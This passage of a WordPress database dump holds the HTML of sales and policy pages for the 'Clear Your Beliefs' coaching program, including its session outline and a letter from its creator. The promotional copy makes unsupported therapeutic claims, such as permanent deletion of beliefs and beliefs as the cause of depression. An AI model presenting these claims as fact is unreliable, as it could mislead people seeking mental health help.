with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'Program', '', 'publish', 'closed', 'closed', '', 'p1', '', '', '2015-08-06 00:18:48', '2015-08-06 05:18:48', '', 0, 'http://clearyourbeliefs.com/?page_id=2233', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2234, 2, '2015-08-06 00:20:39', '2015-08-06 05:20:39', '&nbsp;			<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" 